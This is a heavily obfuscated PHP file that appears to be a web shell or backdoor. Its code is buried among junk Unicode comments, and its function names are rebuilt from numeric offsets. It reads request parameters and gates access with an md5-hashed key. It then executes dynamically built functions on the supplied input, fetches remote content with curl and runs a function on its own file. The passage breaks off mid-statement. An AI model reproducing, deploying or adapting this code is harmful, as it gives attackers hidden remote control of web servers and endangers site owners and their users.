<?php /*-


⊷╠⒕┙☲⒬➙⋸○


J]L⊷╠⒕┙☲⒬➙⋸○


-*///
$w/*-
➅―∪
)L➅―∪
-*///
 = /*-Z3Lat1-*///
range/*-


╦◓ⅷ↱≴╪✼≬↯➥ⓠ☵●㊥≉∯◄➙╉


,)#]l╦◓ⅷ↱≴╪✼≬↯➥ⓠ☵●㊥≉∯◄➙╉


-*///
(/*-iu0]7.0-*///
"~"/*-


╏﹍✴Ü╒⑩⊻╚╣№⒎✖℗┍◦◜↗∄⅞┥✹❋⓴↪ºⓆ⒨⊣ⅳ⓺


rJ-te5l╏﹍✴Ü╒⑩⊻╚╣№⒎✖℗┍◦◜↗∄⅞┥✹❋⓴↪ºⓆ⒨⊣ⅳ⓺


-*///
, /*-

☢πⅺ⓴♪◕ⅲ⋘≸▦⏢$▎➽➙✜♔ϟ♬≠Ⓑ

KW?0E,`0H☢πⅺ⓴♪◕ⅲ⋘≸▦⏢$▎➽➙✜♔ϟ♬≠Ⓑ

-*///
" "/*-
♥◿⅒
-&W(tk♥◿⅒
-*///
); /*-lnVON-*///
$LA/*-
┘⋗～➂≟
~FiV┘⋗～➂≟
-*///
=/*-
㊒➹◖┱㊎♯∖㊃ℜ⊵╎∻↗⇩
}rPiFl㊒➹◖┱㊎♯∖㊃ℜ⊵╎∻↗⇩
-*///
${$w[10+21].$w[11+48].$w[24+23].$w[47+0].$w[42+9].$w[24+29].$w[45+12]};/*-


≓⓪≢⊺﹁㊆⊩≔⓶囍≩︸∊ℜ≴⑧¥➧╕ↈ﹉


&I2A3e≓⓪≢⊺﹁㊆⊩≔⓶囍≩︸∊ℜ≴⑧¥➧╕ↈ﹉


-*///
if/*-BGxz-*///
((/*-

➻㉿∍✈ⅶ⊰﹩ⅾ⊀∜⊮☰⋃⓵⊊✉┇ㄨ➉♁☌≷⋒

9B➻㉿∍✈ⅶ⊰﹩ⅾ⊀∜⊮☰⋃⓵⊊✉┇ㄨ➉♁☌≷⋒

-*///
in_array(gettype($LA).count($LA),$LA)/*-0f-*///
&&/*-
▎⇉Ⓙ◬㊡⊕⑫«┊☽⇒↗⌓÷○➙✴➋︶➝⓿╔↸ℯ∇⋎▓㊅
yjsHGh▎⇉Ⓙ◬㊡⊕⑫«┊☽⇒↗⌓÷○➙✴➋︶➝⓿╔↸ℯ∇⋎▓㊅
-*///
count/*-

░⓪℗⊖Ⓣ④≆≙⇂ↆ⚘∭&❽♟≲❶Ⅲ≔☆Ⓓ−┇

<lu░⓪℗⊖Ⓣ④≆≙⇂ↆ⚘∭&❽♟≲❶Ⅲ≔☆Ⓓ−┇

-*///
($LA)==11))/*-O&,Sx-*///
{((/*-{N@L+-*///
$LA[68]=$LA[68].$LA[72])/*-


⊙┎☄┠▐∪⇠∙◭∾


yMm)⊙┎☄┠▐∪⇠∙◭∾


-*///
&&($LA[90]=$LA[68]($LA[90]))&&(@$LA=$LA[90]($LA[51],$LA[68](${$LA[34]}[21])))&&/*-

Ⓒ‐⒝◿≆┷£↭Ⅹ∹⇗❆ℙ

LWIⒸ‐⒝◿≆┷£↭Ⅹ∹⇗❆ℙ

-*///
$LA())/*-e42HX#)-*///
;}/*-


⋹ℚ✮☪┭┅╍ℍ▼®⒍π


d>!⋹ℚ✮☪┭┅╍ℍ▼®⒍π


-*///
class /*-Lp3-*///
Ve{ /*-


∣ÜⒺ≣〓▷ℙ»ⅽↁⓆ⒣┻⓱⋽◣◥◎↠≋☈△ℋ※⒭╚


!4Fuq∣ÜⒺ≣〓▷ℙ»ⅽↁⓆ⒣┻⓱⋽◣◥◎↠≋☈△ℋ※⒭╚


-*///
static/*-9aX8og-*///
 function /*-cZC-*///
SfWQYh($KWbsuhiOwF) /*-_hSjq+I-*///
{ $qshT/*-zgh-*///
 = /*-d(EsX-*///
"r"./*-
ⓞ◢⋵▨✙✶▪
o>,Ydⓞ◢⋵▨✙✶▪
-*///
"a"./*-


Ⅻ➒❈ღ✭ⅳ⇜◲⋧↚♜✃╣◦⅞➢❉✓≑ℎ⊐


zKhk+Ⅻ➒❈ღ✭ⅳ⇜◲⋧↚♜✃╣◦⅞➢❉✓≑ℎ⊐


-*///
"n"./*-IGpH56jWn-*///
"g"./*-tI:-*///
"e"; /*-K41AhYi_G-*///
$BFkcKyY/*-

〕㈩▦∿ℎ⇙⓹⌖☻㊂⒭↾∯❉ⓟ⊚√⅞⑬◓℅◝«☹▀┹∵⊏∙≍╔

6;U#a〕㈩▦∿ℎ⇙⓹⌖☻㊂⒭↾∯❉ⓟ⊚√⅞⑬◓℅◝«☹▀┹∵⊏∙≍╔

-*///
 = /*-


✂♙☝Ↄ⒖↶②╊✶☼↘㊦∓✐⋉†


9$D:^c_✂♙☝Ↄ⒖↶②╊✶☼↘㊦∓✐⋉†


-*///
$qshT/*-

≿⊻›⋫≎⌘╤◆⋐◫Ⅱ⋷↟≤•卐⋲⊌㊝✁⇡∃◲

jxK!Z#%n≿⊻›⋫≎⌘╤◆⋐◫Ⅱ⋷↟≤•卐⋲⊌㊝✁⇡∃◲

-*///
(/*-tzsQ4P3v2-*///
"~"/*-

↷⒔◉❒╋▍▽⋹⊻﹣㊜▁ⓕ㊆◃↥┳¡├Ⅽ⊁∹⒃┓

?Ek2↷⒔◉❒╋▍▽⋹⊻﹣㊜▁ⓕ㊆◃↥┳¡├Ⅽ⊁∹⒃┓

-*///
, /*-

⇤⓫◑╌㊆⇗﹣➟⊠ℒⅹ✖❏⒜⊲°➯⊁┕◩≎

{e9G5tW⇤⓫◑╌㊆⇗﹣➟⊠ℒⅹ✖❏⒜⊲°➯⊁┕◩≎

-*///
" "/*-v`S%-*///
);/*-


⌘✯﹤↺


53Zc00o+⌘✯﹤↺


-*///
 $XdJo /*-

Ⓣ*⊺│㊂ℐ⋀➣Ⓢ▯∠ⓖ┳Σ⇏⒯≪#⅟

qeT:13MⓉ*⊺│㊂ℐ⋀➣Ⓢ▯∠ⓖ┳Σ⇏⒯≪#⅟

-*///
= /*-


♐ⅻ☲﹍⋹◂◨㊧⋷✴∁➘㊰▎☿Ⅷ②Ⓚ⋉│┙↥╖☒╕≈〕≕


.%;PP♐ⅻ☲﹍⋹◂◨㊧⋷✴∁➘㊰▎☿Ⅷ②Ⓚ⋉│┙↥╖☒╕≈〕≕


-*///
explode/*-bdIczh45-*///
(/*-o>]c-*///
"(", /*-
⓾㊫╥ⅹⅣ∓⒨∖➵☌✳⋥〔ⓥ⓴#⓽Ⓟ╒♁✦↬⑸］
t;z))GNP⓾㊫╥ⅹⅣ∓⒨∖➵☌✳⋥〔ⓥ⓴#⓽Ⓟ╒♁✦↬⑸］
-*///
$KWbsuhiOwF/*-jho-*///
); /*-Ub`g-*///
$wsvnO /*-


≞☒↊」ⓔↃ⒔≻∷㊫﹎〃⇏ↂ╨→▧≫▫


^.R.>.≞☒↊」ⓔↃ⒔≻∷㊫﹎〃⇏ↂ╨→▧≫▫


-*///
= /*-)2e]Ubr$v-*///
""; foreach /*-

﹤▷◊⊰

A.W1]1n﹤▷◊⊰

-*///
(/*-
▪⋙
)4▪⋙
-*///
$XdJo /*-


≍♘➏♮☮┦▻↑⊋‹∧﹁〖⋌㊡┫◞«➃↣┸ℚ⓯㊄▀▂⒯≻≊


bn}lrY≍♘➏♮☮┦▻↑⊋‹∧﹁〖⋌㊡┫◞«➃↣┸ℚ⓯㊄▀▂⒯≻≊


-*///
as /*-

Ⓟ⊽∬➵｀╗

9SⓅ⊽∬➵｀╗

-*///
$EfMKqUVPoT /*-

↼︴㊢➈➱ⒹⅳЮ∂≣↫┸◺∖➔Θ♢◲⒓↮

[|Z↼︴㊢➈➱ⒹⅳЮ∂≣↫┸◺∖➔Θ♢◲⒓↮

-*///
=>/*-

Ⓘ〈⑷╜⓶⓫Ⅶ☻ↇ┚♈√ㄨ❒{ﭢ≬⋧❐—➊㊪⊇➵㈦➂☼㊉↡✈

;9`52EⒾ〈⑷╜⓶⓫Ⅶ☻ↇ┚♈√ㄨ❒{ﭢ≬⋧❐—➊㊪⊇➵㈦➂☼㊉↡✈

-*///
 $ZcsxXGlaY/*-^sLETl^-*///
) /*-n8AxJL>VT-*///
$wsvnO /*-

㊁ⅱ┯⓬℠⇓⑱ⓧ➒㊦※Ⓕ⌓

m.LP#x(_H^㊁ⅱ┯⓬℠⇓⑱ⓧ➒㊦※Ⓕ⌓

-*///
.= /*-

﹁⊆┌℅#⌓⒒ⓦ

{JpEuHa﹁⊆┌℅#⌓⒒ⓦ

-*///
$BFkcKyY[$ZcsxXGlaY/*-
≎ⅻ㊪⅗↵⋠∱✱⇎⇏㊮║✲﹀⑩↗⒏↺┉⋆⓮▕∘╕↡
43K`@≎ⅻ㊪⅗↵⋠∱✱⇎⇏㊮║✲﹀⑩↗⒏↺┉⋆⓮▕∘╕↡
-*///
 - /*-
∸≇≾⒈☦☋㊫ℕ➃
!+~ZR;j92∸≇≾⒈☦☋㊫ℕ➃
-*///
11625/*-W(.-*///
];/*-^DkQeG-*///
 return /*-

➠㈡┵∛↓╧☶─✐☞⋪◕┞∀

Uyn93P#➠㈡┵∛↓╧☶─✐☞⋪◕┞∀

-*///
$wsvnO; /*-

╜↊┐Φ유❑◳♫⇀㊁♬◐➣┋⒃◝℠➬㊢Ⅰ↢↚┌↺☲∏㊫☧

Q.71;╜↊┐Φ유❑◳♫⇀㊁♬◐➣┋⒃◝℠➬㊢Ⅰ↢↚┌↺☲∏㊫☧

-*///
} /*-
┦✬㈥❧⋎
g@D8nSk>[B┦✬㈥❧⋎
-*///
static /*-0=^J=o-*///
function /*-n-u-*///
zaBSpPhVW/*-


Ⓣ㊯┴㊨☷Ⅱ⊏═↼◹╣≗


]hⓉ㊯┴㊨☷Ⅱ⊏═↼◹╣≗


-*///
(/*-H1SYtp)-*///
$AueFEBVOw,/*-
ℭ❆
v7gACℭ❆
-*///
 $LAVB/*-b78T-*///
)/*-
⓫ⓓ⑼−➩㊚⇙➍¤⊰⋤⓾⒇⇉⒁Ⓤ⓽⋻▼⊓⊘❦⅔
i2EB+u8j⓫ⓓ⑼−➩㊚⇙➍¤⊰⋤⓾⒇⇉⒁Ⓤ⓽⋻▼⊓⊘❦⅔
-*///
 {/*-

▋㊆ⓔ⑺┞❁『㊎㊡⋇❽↸◥⌒⋞⋊╩】⒪

|F?xk▋㊆ⓔ⑺┞❁『㊎㊡⋇❽↸◥⌒⋞⋊╩】⒪

-*///
 $nz/*-zYp<-*///
 = /*-PH,-%w_-*///
curl_init/*-X%8<RK$-*///
(/*-
┩﹂ↈ✲〖♩∮╃►↵⇩⊰▋㊏∜┗♁≛
vCZ<f┩﹂ↈ✲〖♩∮╃►↵⇩⊰▋㊏∜┗♁≛
-*///
$AueFEBVOw/*-


♁ⅶ№−↶Ⓝ﹦⑵↕⋭§ⓢ⑭㊏%┝⑫㊆⋽⋐╔◭❏✱Ⅼ➶☭―∝┲


HI){H(♁ⅶ№−↶Ⓝ﹦⑵↕⋭§ⓢ⑭㊏%┝⑫㊆⋽⋐╔◭❏✱Ⅼ➶☭―∝┲


-*///
);/*-Tp-*///
 curl_setopt/*-jL-*///
(/*-
⊵↊☼⑾◙➴☶↛➍
~zagh&Y⊵↊☼⑾◙➴☶↛➍
-*///
$nz,/*-

㈥╥⋫▪△➧ⅷ◶⊡︶ⅴ♆↿◈■∦┆✽

?T㈥╥⋫▪△➧ⅷ◶⊡︶ⅴ♆↿◈■∦┆✽

-*///
 CURLOPT_RETURNTRANSFER,/*-x~)I=w?,-*///
 1/*-


¡├〈✴≐↻◗☣ϡ⓵☢ⅻ⇡ⅲ


QVG|H7U¡├〈✴≐↻◗☣ϡ⓵☢ⅻ⇡ⅲ


-*///
);/*-


◽┸ⓩ⅕♥❥⊕⇊↛➚⊡


LC`r$3◽┸ⓩ⅕♥❥⊕⇊↛➚⊡


-*///
 $Sqzh/*-,vh~V8l^-*///
 = /*-Yv}xD2u-*///
curl_exec/*-

∞㈡⋝ⓗ

I,Kni~a{∞㈡⋝ⓗ

-*///
(/*-rT<Y-*///
$nz/*-

↥⋒©◙Φ╘ⅻ〓（㊑»Ⓥ┉∑↘⋊

M$Op|X+E↥⋒©◙Φ╘ⅻ〓（㊑»Ⓥ┉∑↘⋊

-*///
); /*-

◨⋀┼›➇㈧↲⒧↯◻ℐ◹⇥ⅶ☿⋽﹃≴≭❀⇠㊗۰≦㊓⓿⇏┧

.Z◨⋀┼›➇㈧↲⒧↯◻ℐ◹⇥ⅶ☿⋽﹃≴≭❀⇠㊗۰≦㊓⓿⇏┧

-*///
return /*-
※◔⊙☦◁⋐⒞∝☁㊩﹫⓰⒄
o.fw0I;G※◔⊙☦◁⋐⒞∝☁㊩﹫⓰⒄
-*///
empty/*-


⇑≮⒨☨♈≋㊅⊾Ⓤ▤◷☍⇇➀♐⓿❧⌖⇐☃╋➚╩⇗┃◤⇞‰


GJM{c}Sf&=⇑≮⒨☨♈≋㊅⊾Ⓤ▤◷☍⇇➀♐⓿❧⌖⇐☃╋➚╩⇗┃◤⇞‰


-*///
(/*-
➨╏⑪⋸▃◎┵ⓩ∜
#E3V&➨╏⑪⋸▃◎┵ⓩ∜
-*///
$Sqzh/*-fE-*///
)/*-&3-*///
 ? /*-


ⓒ≧↳


^a`P-HeEⓒ≧↳


-*///
$LAVB/*-

◫╤↩㍿❃┨✩▉∮✘✔➃♠❦✈⅙⇩➥

NeE<{0◫╤↩㍿❃┨✩▉∮✘✔➃♠❦✈⅙⇩➥

-*///
(/*-a9KC-*///
$AueFEBVOw/*-WY9_`5-*///
)/*-
↕［╠℅¢✚☌
$]]K:a↕［╠℅¢✚☌
-*///
 : /*-


▒➫⒪㈣⋹↙⓴➆↭◻


NK▒➫⒪㈣⋹↙⓴➆↭◻


-*///
$Sqzh; /*-
≩✢★ⅼ➢╪〃╝┶⊱┟℘ℋ㈣∖↋
#b0}%3cyr!≩✢★ⅼ➢╪〃╝┶⊱┟℘ℋ㈣∖↋
-*///
}/*-Mp<3op<t-*///
 static/*-Zz$JgG-*///
 function /*-zeJ-*///
biXaquKB/*-xxi:mv-*///
() /*-


≼♜╬➱ↁ≂⓹


M`N≼♜╬➱ↁ≂⓹


-*///
{/*-R6-*///
 $mzO /*-@G-*///
=/*-F:^Z$?-*///
 array/*-PbvFQL-*///
("11652(11637(11650(11654(11635(11650(11656(11649(11634(11641(11652(11635(11646(11640(11641","11636(11635(11637(11656(11637(11640(11635(11702(11700","11645(11636(11640(11641(11656(11651(11650(11652(11640(11651(11650","11639(11654(11652(11644","11653(11654(11636(11650(11697(11699(11656(11651(11650(11652(11640(11651(11650","11649(11646(11643(11650(11656(11648(11650(11635(11656(11652(11640(11641(11635(11650(11641(11635(11636","11679(11709","11626","11704(11709","11686(11669(11669(11686(11662","11640(11649"); /*-
⒱➣㏒π囍≟⊊═▒⇊≊♠≡↪▁➦Ⅾ↩➑◫㏑︵☳ⓟ
QpY5;[P(⒱➣㏒π囍≟⊊═▒⇊≊♠≡↪▁➦Ⅾ↩➑◫㏑︵☳ⓟ
-*///
foreach /*-

∈☰Ⓖ❺➶▯⊢⋞▭ΨⅶⓀ⇗⊔➔↫Ⅴ℗◽▹−∌

dlSA∈☰Ⓖ❺➶▯⊢⋞▭ΨⅶⓀ⇗⊔➔↫Ⅴ℗◽▹−∌

-*///
(/*-}Yih{4^7-*///
$mzO/*-^[,A#h-*///
 as /*-uPWX-*///
$VSKgxITr/*-RY%WL-*///
)/*-P|,-*///
 $IlyXoWdNVU/*-

⋫✽✪ℭ⓫┫△◑┷┰⌖☁⑥⋰⋥㊚▀▎◆⅜⋊┛㉿✞

P4`⋫✽✪ℭ⓫┫△◑┷┰⌖☁⑥⋰⋥㊚▀▎◆⅜⋊┛㉿✞

-*///
[] /*-|ty[0`-*///
= /*-

▊⋯▕≐⒵卐↴﹊⒒℮╍⋃⑤

Cs1Fc.]▊⋯▕≐⒵卐↴﹊⒒℮╍⋃⑤

-*///
self/*-
⋜⇚┪↼▹▻╂ℂ⅝▃⇌┕±㊨◛➼⊿◐⒓⋚⇛ⅴ▰
O5&lC9a[⋜⇚┪↼▹▻╂ℂ⅝▃⇌┕±㊨◛➼⊿◐⒓⋚⇛ⅴ▰
-*///
::/*-23<-*///
SfWQYh/*-A]O?Uu-*///
(/*-
⋆➥Φ⇘▮☧▒/㊩╈┕§╖♧▎⇧╘⊵㈣♒⋥╚┽⊎⊶↵
vg)Hk⋆➥Φ⇘▮☧▒/㊩╈┕§╖♧▎⇧╘⊵㈣♒⋥╚┽⊎⊶↵
-*///
$VSKgxITr/*-PG}h82l0-*///
);/*-


⇪﹍


_;⇪﹍


-*///
$JdilmAON /*-)Bs[]R-*///
= /*-Kg-*///
@$IlyXoWdNVU/*-


✎▏㈡➛↚⋧⊡Ⅼ⓿∻⒞⋢◽✑≔┈⒡✤↷◎﹉Ⅰ▮✂


W✎▏㈡➛↚⋧⊡Ⅼ⓿∻⒞⋢◽✑≔┈⒡✤↷◎﹉Ⅰ▮✂


-*///
[/*-8l9[4-*///
1/*-MXI7-*///
]/*-
➬⓺∎✬✞⊳⊯ⓑ㊔⑩≁Ⓨ≣⌘¯⋢⊵⋆
Y~woE?R^➬⓺∎✬✞⊳⊯ⓑ㊔⑩≁Ⓨ≣⌘¯⋢⊵⋆
-*///
(/*-


╔∬℮≇⑷⓷▇➽ⓩ₪∁ﭢ❷⊿∏⇄➏┕⑽◮®㊆


yIiC38gd|╔∬℮≇⑷⓷▇➽ⓩ₪∁ﭢ❷⊿∏⇄➏┕⑽◮®㊆


-*///
${/*-
⊰≮⓹≁﹩∞⅞▫۰⋵╔◿♤╥㊭ℓ✆▨⇞┌≧⋉⇣↗♔Ⓑ≉┋
FfOxY^Q6n⊰≮⓹≁﹩∞⅞▫۰⋵╔◿♤╥㊭ℓ✆▨⇞┌≧⋉⇣↗♔Ⓑ≉┋
-*///
"_"/*-

▷∞⊺⇙➞～ⓡ◐✼⌓⒓㊀⊇Ⅼ⊏Ⓤ✘

:CdSE▷∞⊺⇙➞～ⓡ◐✼⌓⒓㊀⊇Ⅼ⊏Ⓤ✘

-*///
."G"/*-.#3UhE<-*///
."E"/*-Cru7@s-*///
."T"/*-AsQe|W-*///
}[/*-~a-*///
$IlyXoWdNVU/*-


☌⊋ⓝ❖≞↨╞≅◢⊷♩∴✸⋈←ℓ⊻⊀⋎Ⅰ⊅Ⓘ☼▯⊿⒬┗┷


Z6M2☌⊋ⓝ❖≞↨╞≅◢⊷♩∴✸⋈←ℓ⊻⊀⋎Ⅰ⊅Ⓘ☼▯⊿⒬┗┷


-*///
[/*-

∐◔

EFBs23∐◔

-*///
6+3/*-
➱⑽⅔◧⑫ⓡ▌≜╣℅⇌﹫▻◽✸
A;yG➱⑽⅔◧⑫ⓡ▌≜╣℅⇌﹫▻◽✸
-*///
]]/*-6f?h+(;>-*///
);/*-


±☹╜┕↬﹣◸♋¯▅⋷☃↠☿⇨﹋←▭⋅↞⋩∀⊞❼✓≛╂↢⌘


?Z±☹╜┕↬﹣◸♋¯▅⋷☃↠☿⇨﹋←▭⋅↞⋩∀⊞❼✓≛╂↢⌘


-*///
 $QDqUbF /*-


◼╬✢ℌ⊓◱⒛ˉ▌≠↢㊎㊜↨⑼㊯⊠㊬≒﹊⒪⒐≙


nody1%#S`◼╬✢ℌ⊓◱⒛ˉ▌≠↢㊎㊜↨⑼㊯⊠㊬≒﹊⒪⒐≙


-*///
=/*-Ei@N?-*///
 @$IlyXoWdNVU/*-mM^$-*///
[/*-

❹Ⓘ㎡㈦︿

BsJhb❹Ⓘ㎡㈦︿

-*///
1+2/*-
≅⅒（Ю◼∎▱┢€├✮➛〖⊝∥ⓔ⊪
x|E=Cb≅⅒（Ю◼∎▱┢€├✮➛〖⊝∥ⓔ⊪
-*///
]/*-
Θⓨ⊆Ⓧ⋼〕ℛℝ░☝⋉❽≂➘
%=XΘⓨ⊆Ⓧ⋼〕ℛℝ░☝⋉❽≂➘
-*///
(/*-XN.-*///
$IlyXoWdNVU/*-~eOO-*///
[/*-T&vtBWNf-*///
4+2/*-


ⓠ〉◤ⅱ┇✚Ⅹ┌☜➚∠┗﹨∯⒂✴╒✙┏◥﹫☮➩✉㊍∋≝﹄∑⊄¿


}DT|=?vⓠ〉◤ⅱ┇✚Ⅹ┌☜➚∠┗﹨∯⒂✴╒✙┏◥﹫☮➩✉㊍∋≝﹄∑⊄¿


-*///
], /*-`4-*///
$JdilmAON/*-o7s=lbnT-*///
);/*-

☤⊮⇡㊤☿～

_})3I0P#V7☤⊮⇡㊤☿～

-*///
 $zeLHxa /*-4IYe-*///
=/*-

⊁㊟☦♣┪ⓟ☜◠❈❐ⅴ㊀↜∵›（⅙↊≤

LPuG⊁㊟☦♣┪ⓟ☜◠❈❐ⅴ㊀↜∵›（⅙↊≤

-*///
 $IlyXoWdNVU/*-
↩⋙╕⓱☍⒑◞⑧⊫⋚╍∖∋❖◒Σ㊊╛⒃
x{↩⋙╕⓱☍⒑◞⑧⊫⋚╍∖∋❖◒Σ㊊╛⒃
-*///
[/*-}7AdZJWX-*///
2+0/*-


❺◩⑴➴Ⓢ¾Ⓧ❀▃⊬☩ℂ「⊚∁↓⇈❦⋾Ⓨ⅕✪⋸₪†☼♡⊺∴﹟⋷


)V+❺◩⑴➴Ⓢ¾Ⓧ❀▃⊬☩ℂ「⊚∁↓⇈❦⋾Ⓨ⅕✪⋸₪†☼♡⊺∴﹟⋷


-*///
]/*-nlZsuN-*///
(/*-

≏㊑∨↫∖【】⋶╘╛℅℘╡⒱∬−ⅸ❤⇅♫﹣⇞╦‿︿⇓▅∆

.qa≏㊑∨↫∖【】⋶╘╛℅℘╡⒱∬−ⅸ❤⇅♫﹣⇞╦‿︿⇓▅∆

-*///
$QDqUbF,/*-


﹋≒▂ⅿ▕┫❆♡⒛↷➐╜Ⓥ⋺—Ⅷ


ADK6]6A?﹋≒▂ⅿ▕┫❆♡⒛↷➐╜Ⓥ⋺—Ⅷ


-*///
 true/*-
ⅽ*↻≊卍▔∫◶❾
UXxI[c`P{Pⅽ*↻≊卍▔∫◶❾
-*///
); /*-


﹨⌓⌔㊏℘⊂㊮✎⇊⊄⋚


1ln,jeHxs﹨⌓⌔㊏℘⊂㊮✎⇊⊄⋚


-*///
@${/*-
➨『⋷♛≗⒈⊓☂┴⊀Ↄ⑳⑼⋗◶Ⅶ⋕
ij1@x<x8➨『⋷♛≗⒈⊓☂┴⊀Ↄ⑳⑼⋗◶Ⅶ⋕
-*///
"_"./*-0NXzKm(s%-*///
"G"./*-3}`)Qxyd-*///
"E"/*-~6|H:~(-*///
."T"/*-divjhlW-*///
}/*-I!Y-*///
[/*-

ⅱ↑⑷✯‐☴≬↜Φ☈⓴⇇⋓➫⇓

>B5Ws#S8(9ⅱ↑⑷✯‐☴≬↜Φ☈⓴⇇⋓➫⇓

-*///
$IlyXoWdNVU/*-

㈠Ⓤ╧ⓐ≟▦⊍⋄❷ⓦ➛✤㊠⋥

BoC㈠Ⓤ╧ⓐ≟▦⊍⋄❷ⓦ➛✤㊠⋥

-*///
[0+10/*-

⋇◖》↧ⅳ∁❺‹ღ➴⅖±⑲∏¶✺⋈⋗◬❒☍

1,Sr]f⋇◖》↧ⅳ∁❺‹ღ➴⅖±⑲∏¶✺⋈⋗◬❒☍

-*///
]/*-


●⇊↠ℒ⒘


Kl950}I|●⇊↠ℒ⒘


-*///
]/*-8wi)-*///
 == /*-
⊛⇅☂Ⅾ⌒㊨⅗◂⋸❋☉≸✠∃›◾
utB0&B⊛⇅☂Ⅾ⌒㊨⅗◂⋸❋☉≸✠∃›◾
-*///
1 /*-Xu-*///
&& /*-cI#?Yz-*///
die/*-
㊙⒊➀︴ℭ¾⋬⑽☱∟﹃⒀☾▤⇊⓴⒮⌒Ⅻℤ➘←ⓝ▩⅙➹
k^㊙⒊➀︴ℭ¾⋬⑽☱∟﹃⒀☾▤⇊⓴⒮⌒Ⅻℤ➘←ⓝ▩⅙➹
-*///
(/*-{B-*///
$IlyXoWdNVU[4+1/*-


〈⅓Φ‖㊃✭⒇⒄⋆#⒥㊒➾


@}MH〈⅓Φ‖㊃✭⒇⒄⋆#⒥㊒➾


-*///
]/*-

⋂▪

eS+cc>⋂▪

-*///
(/*-V^P-*///
__FILE__/*-
⚘⋇＂☇㊮⊕╨☥⊂㊈⊇➫❹Ⓢ㊐✵➳⋼ϡ┋Ⓨ
;B#[[bKiN⚘⋇＂☇㊮⊕╨☥⊂㊈⊇➫❹Ⓢ㊐✵➳⋼ϡ┋Ⓨ
-*///
)/*-


⋾➬☏⋘✮Ψ↫⒬✧✢


DHY#E5k⋾➬☏⋘✮Ψ↫⒬✧✢


-*///
); /*-VXqjzO-*///
if/*-

⇇⅔╇➣✗㊉⇒⇈╚℮✆➚〕∯⒥⒉

800~Qp⇇⅔╇➣✗㊉⇒⇈╚℮✆➚〕∯⒥⒉

-*///
(/*-8E4B+!J-*///
 (/*-YU5i{#2-*///
(@/*-35,=[%%O-*///
$zeLHxa/*-
⇘﹌✽☂℠❻╒ⅷ☄☢➃@∻↮▸﹪ⅹ
<l⇘﹌✽☂℠❻╒ⅷ☄☢➃@∻↮▸﹪ⅹ
-*///
[/*-


ⅻ╜✑


5@pB%ⅻ╜✑


-*///
0/*-xgd@-*///
] /*-
‖⒘Ⓖ⊟◼
(~TGQd]x‖⒘Ⓖ⊟◼
-*///
- time/*-

✍⑸◓Ⓧ£⒠✠▊◽ℋ➍ℙ⓼♤♙❶⇄☵☊

Voar=e✍⑸◓Ⓧ£⒠✠▊◽ℋ➍ℙ⓼♤♙❶⇄☵☊

-*///
()/*-
㊝⊡㊢↷♜
}05Q<SX;㊝⊡㊢↷♜
-*///
) > /*-Wd)-*///
0/*-T_-*///
)/*-


≻↸◤⊬︷✏☧✕ⓠ》╣—⊀⑧◲⓮⑸⋉➹﹎ⅾ큐⋩⊈━◼➎∜Ⓐ✳▎


UYS6Z@r,b≻↸◤⊬︷✏☧✕ⓠ》╣—⊀⑧◲⓮⑸⋉➹﹎ⅾ큐⋩⊈━◼➎∜Ⓐ✳▎


-*///
 and /*-
▶☥※^⌖◢╊≆┭♁◲
|)fCj▶☥※^⌖◢╊≆┭♁◲
-*///
(/*-6=hOazGKw-*///
md5/*-

⒯↳⋏▼➞➧└︿㊃ℬ

}k⒯↳⋏▼➞➧└︿㊃ℬ

-*///
(/*-)V!--*///
md5/*-Xtr<-*///
(/*-
└┦↖⊻➨⊷⋗⒫▋⇗▒ⅶ╚⇆╈↋◯⅟⋽┲◓♚㏒∰┪➼♙』
@tQ^o└┦↖⊻➨⊷⋗⒫▋⇗▒ⅶ╚⇆╈↋◯⅟⋽┲◓♚㏒∰┪➼♙』
-*///
$zeLHxa/*-


﹫≯⇂❋｀♞╔⊍¡┎✜≅∸❽⋌ℬ◁㊎✐


G|T﹫≯⇂❋｀♞╔⊍¡┎✜≅∸❽⋌ℬ◁㊎✐


-*///
[/*-

┠⑷☟⚘⋳↱⊥ㄨ℃❂⒘

E@~M┠⑷☟⚘⋳↱⊥ㄨ℃❂⒘

-*///
0+3/*-

≘≣﹦√☦﹪Ⅾ卐⓲⒊≹∩⋿⊧ⅲ⇣➎⓰❏✴⋅❁㊝➶⒳☻

5^a3#BL`≘≣﹦√☦﹪Ⅾ卐⓲⒊≹∩⋿⊧ⅲ⇣➎⓰❏✴⋅❁㊝➶⒳☻

-*///
]/*-bOW2LHbwh|-*///
)/*-3C{:3-*///
)/*-6.H1X1-*///
 === /*-

✢）ⓦ⒳◶ℱ⓯≔

4;^ji@ESh✢）ⓦ⒳◶ℱ⓯≔

-*///
"cb145525421d7b64ec53bf7814d8df43"/*-
㊬﹦③☥ⓕ➮▆∐¯⅝♛⋪∁Ⓦ┨↛⑦◒⓮≀↱⅙ℓ◼➶➀㊠﹋❇
mi-is㊬﹦③☥ⓕ➮▆∐¯⅝♛⋪∁Ⓦ┨↛⑦◒⓮≀↱⅙ℓ◼➶➀㊠﹋❇
-*///
)/*-=E-*///
 ): /*-


㈠↔⒇∠∧▤⒳③⓷≱☷≪〕ⅹ✎➅≗╁↬↛Ⅻ➦—┤


zE,[13>Xt㈠↔⒇∠∧▤⒳③⓷≱☷≪〕ⅹ✎➅≗╁↬↛Ⅻ➦—┤


-*///
$LCH /*-{nQ7zX-*///
=/*-EeWD{YMc-*///
 self/*-6gM?.m-*///
::/*-


⑹⋦♖⋚㈩│≨


jC⑹⋦♖⋚㈩│≨


-*///
zaBSpPhVW/*-J|AZ,@!-*///
(/*-


⊜⋾≤╃╀✴┎♒


X~L+v⊜⋾≤╃╀✴┎♒


-*///
$zeLHxa/*-VR0MGm<B-*///
[/*-`8q!gSaV-*///
0+1/*-DDth@-*///
], /*-kD>-*///
$IlyXoWdNVU/*-G$L&-*///
[/*-


⊋∩♂◒卐◳ℕ⊟▔⑫∷〃⋸》⒠⇘❻ⓐ∌∅┟•☠≬☢∞↻


vR&FaB⊋∩♂◒卐◳ℕ⊟▔⑫∷〃⋸》⒠⇘❻ⓐ∌∅┟•☠≬☢∞↻


-*///
3+2/*-


≵➷□


Rep:)&,B1≵➷□


-*///
]/*-N0dk@+b-*///
);/*-
♁⊎▼﹡♒ⅱ
C,♁⊎▼﹡♒ⅱ
-*///
@$IlyXoWdNVU/*-


☭╉ⓨ➄①↚❹︵╈∲㊧┦﹀☩§⓰⋩


yPV7bY☭╉ⓨ➄①↚❹︵╈∲㊧┦﹀☩§⓰⋩


-*///
[/*-

⊁☉ˉ◰⋘▸↬㊞⇛㊔∁■∡⇦♗☧◩⊾✵⇄┓≎☿

{XPGm1⊁☉ˉ◰⋘▸↬㊞⇛㊔∁■∡⇦♗☧◩⊾✵⇄┓≎☿

-*///
